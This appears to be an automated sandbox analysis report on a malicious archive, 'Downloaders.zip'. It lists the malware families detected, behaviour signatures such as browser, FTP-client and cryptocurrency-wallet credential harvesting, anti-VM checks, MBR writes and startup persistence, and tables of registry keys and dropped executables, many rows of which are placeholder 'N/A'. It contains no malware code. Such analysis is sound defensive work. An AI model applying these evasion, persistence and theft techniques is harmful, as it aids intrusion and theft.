Malware Analysis Report

2025-01-23 11:53

Sample ID 241126-xpcehs1lck
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags
amadey ammyyadmin asyncrat babbleloader flawedammyy lumma neshta phorphiex quasar redline stealc xworm zharkbot default_valenciga fed3aa mars office04 bootkit botnet credential_access defense_evasion discovery evasion execution infostealer loader persistence pyinstaller rat spyware stealer themida trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

amadey ammyyadmin asyncrat babbleloader flawedammyy lumma neshta phorphiex quasar redline stealc xworm zharkbot default_valenciga fed3aa mars office04 bootkit botnet credential_access defense_evasion discovery evasion execution infostealer loader persistence pyinstaller rat spyware stealer themida trojan upx worm

AmmyyAdmin payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

AsyncRat

Ammyy Admin

Redline family

Xworm family

Zharkbot family

Amadey

Detect Xworm Payload

Lumma Stealer, LummaC

Phorphiex payload

Quasar RAT

Xworm

Detects ZharkBot payload

Stealc

Quasar family

BabbleLoader

Neshta

Detect Neshta payload

Detects BabbleLoader Payload

Quasar payload

Asyncrat family

Ammyyadmin family

RedLine

Phorphiex, Phorpiex

FlawedAmmyy RAT

Phorphiex family

Lumma family

Flawedammyy family

ZharkBot

Neshta family

Amadey family

Stealc family

Babbleloader family

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Drops file in Drivers directory

Themida packer

Identifies Wine through registry keys

Checks computer location settings

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Checks BIOS information in registry

Loads dropped DLL

Modifies system executable filetype association

Reads data files stored by FTP clients

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Writes to the Master Boot Record (MBR)

Indicator Removal: File Deletion

Adds Run key to start application

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Embeds OpenSSL

Program crash

System Location Discovery: System Language Discovery

Detects Pyinstaller

Unsigned PE

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Modifies registry key

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Detects videocard installed

Views/modifies file attributes

Runs ping.exe

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-26 19:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-26 19:01

Reported

2024-11-26 19:19

Platform

win10ltsc2021-20241023-en

Max time kernel

165s

Max time network

608s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

BabbleLoader

loader babbleloader

Babbleloader family

babbleloader

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects BabbleLoader Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects ZharkBot payload

Description Indicator Process Target
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Neshta

persistence spyware neshta

Neshta family

neshta

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

Xworm

trojan rat xworm

Xworm family

xworm

ZharkBot

botnet zharkbot

Zharkbot family

zharkbot

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe N/A
N/A N/A C:\Windows\system32\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\soft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\sysnldcvmr.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
N/A N/A C:\Windows\svchost.com N/A
